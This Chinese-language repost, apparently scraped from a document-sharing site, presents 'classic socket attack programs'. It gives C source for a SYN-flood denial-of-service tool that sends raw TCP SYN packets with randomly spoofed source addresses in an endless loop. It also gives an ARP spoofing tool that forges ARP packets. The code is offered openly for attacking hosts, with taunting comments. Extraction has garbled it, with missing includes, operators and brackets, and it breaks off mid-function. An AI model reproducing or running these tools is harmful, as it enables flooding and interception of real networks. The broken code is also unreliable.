幾個經(jīng)典的SOCKET攻擊程序

1、轉(zhuǎn)載幾個經(jīng)典的SOCKET攻擊程序信息來源：鄭州大學(xué)平安園文章 不詳文章修改：cbchen1,著名的dos攻擊軟件 CODE:/* DOS.c */ #include #include #include #include #include #include #include #include #include void send_tcp(int sockfd,struct sockaddr_in *addr); unsigned short check_sum(unsigned short *addr,int len); int main(int argc,char *argv) int DE

2、STPORT; int sockfd; struct sockaddr_in addr; struct hostent *host; int on=1; if(argc != 3) fprintf(stderr,Usage:dos host port.n); exit(1); DESTPORT = atoi(argv2); printf(no is attacking host %s with port %d.n,argv1,DESTPORT); /printf(ok started!n); bzero(&addr,sizeof(struct sockaddr_in); addr.sin_fa

3、mily=AF_INET; addr.sin_port=htons(DESTPORT); if(inet_aton(argv1,&addr.sin_addr)=0) host=gethostbyname(argv1); if(host=NULL) fprintf(stderr,HostName Error:%sna,hstrerror(h_errno); exit(1); addr.sin_addr=*(struct in_addr *)(host-h_addr_list0); /* 使用IPPROTO_TCP創(chuàng)立一個TCP的原始套接字 */ sockfd=socket(AF_INET,SOC

4、K_RAW,IPPROTO_TCP); if(sockfdip_v=IPVERSION; /* 版本一般的是 4 */ ip-ip_hl=sizeof(struct ip)2; /* IP數(shù)據(jù)包的頭部長度 */ ip-ip_tos=0; /* 效勞類型 */ ip-ip_len=htons(head_len); /* IP數(shù)據(jù)包的長度 */ ip-ip_id=0; /* 讓系統(tǒng)去填寫吧 */ ip-ip_off=0; /* 和上面一樣,省點(diǎn)時間 */ ip-ip_ttl=MAXTTL; /* 最長的時間 255 */ ip-ip_p=IPPROTO_TCP; /* 我們要發(fā)的是 TCP包 */

5、 ip-ip_sum=0; /* 校驗(yàn)和讓系統(tǒng)去做 */ ip-ip_dst=addr-sin_addr; /* 我們攻擊的對象 */ /* 開始填寫TCP數(shù)據(jù)包 */ tcp=(struct tcphdr *)(buffer +sizeof(struct ip); tcp-source=htons(LOCALPORT); tcp-dest=addr-sin_port; /* 目的端口 */ tcp-seq=random(); tcp-ack_seq=0; tcp-doff=5; tcp-syn=1; /* 我要建立連接 */ tcp-check=0; /* 好了,一切都準(zhǔn)備好了.效勞器,你準(zhǔn)

6、備好了沒有? _ */ while(1) /* 你不知道我是從那里來的,慢慢的去等吧! */ ip-ip_src.s_addr=random(); /* 什么都讓系統(tǒng)做了,也沒有多大的意思,還是讓我們自己來校驗(yàn)頭部吧 */ /* 下面這條可有可無 */ tcp-check=check_sum(unsigned short *)tcp, sizeof(struct tcphdr); sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in); /* 下面是首部校驗(yàn)和的算法,偷了別人的 */ unsigned short chec

7、k_sum(unsigned short *addr,int len) register int nleft=len; register int sum=0; register short *w=addr; short answer=0; while(nleft1) sum+=*w+; nleft-=2; if(nleft=1) *(unsigned char *)(&answer)=*(unsigned char *)w; sum+=answer; sum=(sum16)+(sum&0xffff); sum+=(sum16); answer=sum; return(answer); Copy

8、 to clipboard2,arp攻擊軟件 CODE:/* main.c - description - begin : 五 2月 14 20:00:42 CST 2003 copyright : (C) 2003 by root email : rootncmgr */ /* * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Fre

9、e Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * */ #include #include #include #include #include #include #include /*#include */ #include #include #define ETH_HW_ADDR_LEN 6 #define IP_ADDR_LEN 4 #define ARP_FRAME_TYPE 0x0806 #define ETHER_HW_TY

10、PE 1 #define IP_PROTO_TYPE 0x0800 #define OP_ARP_REQUEST 2 #define DEFAULT_DEVICE eth0 char usage=send_arp: sends out custom ARP packet.n tusage:send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr times nn; struct arp_packet u_char targ_hw_addrETH_HW_ADDR_LEN; u_char src_hw_addrETH_HW_ADDR_LEN

11、; u_short frame_type; u_short hw_type; u_short prot_type; u_char hw_addr_size; u_char prot_addr_size; u_short op; u_char sndr_hw_addrETH_HW_ADDR_LEN; u_char sndr_ip_addrIP_ADDR_LEN; u_char rcpt_hw_addrETH_HW_ADDR_LEN; u_char rcpt_ip_addrIP_ADDR_LEN; u_char padding18; ; void die(char *); void get_ip_

12、addr(struct in_addr*,char*); void get_hw_addr(char*,char*); int main(int argc,char* argv) struct in_addr src_in_addr,targ_in_addr; struct arp_packet pkt; struct sockaddr sa; int sock; int j,number; if(argc != 6)die(usage); sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP); if(sock0) perror(socket er

13、ror!); exit(1); number = atoi(argv5); pkt.frame_type = htons(ARP_FRAME_TYPE); pkt.hw_type = htons(ETHER_HW_TYPE); t_type = htons(IP_PROTO_TYPE); pkt.hw_addr_size = ETH_HW_ADDR_LEN; t_addr_size = IP_ADDR_LEN; pkt.op=htons(OP_ARP_REQUEST); get_hw_addr(pkt.targ_hw_addr,argv4); get_hw_addr

14、(pkt.rcpt_hw_addr,argv4); get_hw_addr(pkt.src_hw_addr,argv2); get_hw_addr(pkt.sndr_hw_addr,argv2); get_ip_addr(&src_in_addr,argv1); get_ip_addr(&targ_in_addr,argv3); memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN); memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN); bzero(pkt.padding,18); strcpy(s

15、a.sa_data,DEFAULT_DEVICE); for (j=0;j if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa) s_addr=inet_addr(str); if(in_addr-s_addr = -1) if( (hostp = gethostbyname(str) bcopy(hostp-h_addr,in_addr,hostp-h_length); else fprintf(stderr,send_arp: unknown host %sn,str); exit(1); void get_hw_addr(char* buf,char* str) int i; char c,val; for(i=0;i if( !(c = tolower(*str+) die(Invalid hardware